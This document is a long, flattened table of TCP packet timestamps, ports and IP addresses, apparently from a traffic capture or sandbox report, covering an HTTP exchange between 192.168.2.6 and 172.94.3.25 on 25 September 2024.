                                        Sep 25, 2024 18:40:28.670099974 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670101881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670114040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670120001 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670125008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670156002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670171022 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670202971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670376062 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670387030 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670397043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670408964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670419931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670420885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670432091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670439005 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670443058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670456886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670475006 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670495033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670504093 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670681000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670692921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670703888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670715094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670717001 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670742035 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670882940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670900106 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670913935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670926094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670927048 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670937061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670948982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670952082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670977116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671164989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671334982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671346903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671358109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671371937 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671401978 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671494007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671511889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671530962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671541929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671545029 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671552896 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671561003 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671565056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671581984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671590090 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671592951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671603918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671614885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671622038 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671642065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671642065 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671658993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671670914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671681881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671693087 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671695948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671706915 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671720028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671722889 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671726942 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671732903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671739101 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671744108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671756029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671766996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671767950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671777964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671789885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671798944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671816111 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.711159945 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.934303999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.934401989 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.973079920 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978132010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978162050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978176117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978224039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978235960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978246927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978260040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978279114 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978307009 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978374958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978385925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978410006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978415012 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978421926 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978434086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978446007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978457928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978467941 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978468895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978482008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978487968 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978526115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978634119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978645086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978656054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978667974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978679895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978679895 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978712082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978904009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978914022 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978919983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978930950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978950024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978959084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978961945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978974104 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978984118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978996992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978998899 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979007959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979020119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979024887 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979031086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979043007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979047060 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979053974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979065895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979065895 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979077101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979082108 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979089975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979100943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979101896 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979111910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979127884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979132891 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979161978 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979338884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979351044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979361057 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979381084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979407072 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979515076 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979532003 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979543924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979557037 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979567051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979578018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979583025 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979589939 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979600906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979614019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979614973 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979625940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979638100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979646921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979649067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979660988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979672909 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979672909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979684114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979697943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979705095 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979710102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979723930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979746103 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979774952 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979952097 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979964018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979974031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979984999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979996920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980036020 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980103016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980113983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980125904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980137110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980146885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980160952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980163097 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980169058 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980178118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980189085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980200052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980211020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980218887 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980221987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980232954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980243921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980247021 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980256081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980267048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980268955 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980278015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980287075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980288982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980299950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980308056 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980313063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980329990 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980357885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980618000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980638981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980652094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980686903 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980784893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980796099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980807066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980818033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980823994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980829000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980846882 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980846882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980864048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980873108 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980874062 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980885983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980896950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980907917 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980909109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980918884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980920076 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980931044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980941057 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980952024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.980972052 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980972052 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.980993032 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981003046 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981013060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981024027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981036901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981049061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981059074 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981060028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981070995 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981081963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981092930 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981092930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981105089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981112957 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981116056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981127024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981133938 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981138945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981173992 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981738091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981750011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981760979 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981771946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981781960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981787920 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981795073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981800079 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981813908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981817961 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981826067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981836081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981847048 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981847048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981858969 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981868982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981879950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981882095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981893063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981901884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981904984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981915951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981920958 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981930971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981941938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981941938 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981952906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981964111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981971025 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.981977940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981988907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.981998920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982000113 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982012033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982021093 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982039928 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982284069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982295036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982306957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982317924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982322931 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982328892 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982341051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982353926 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982398987 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982433081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982444048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982455969 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982466936 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982471943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982489109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982494116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982501030 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982511044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982522964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982528925 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982533932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982546091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982547998 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982557058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982567072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982577085 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982578039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982589006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982603073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982609034 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982614994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982625961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982637882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982647896 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982654095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982676983 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982692957 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.982952118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982963085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982974052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982985973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.982991934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983021021 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983094931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983107090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983118057 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983129025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983139992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983153105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983154058 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983165026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983177900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983187914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983196974 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.983198881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.983210087 CEST8049716172.94.3.25192.168.2.6
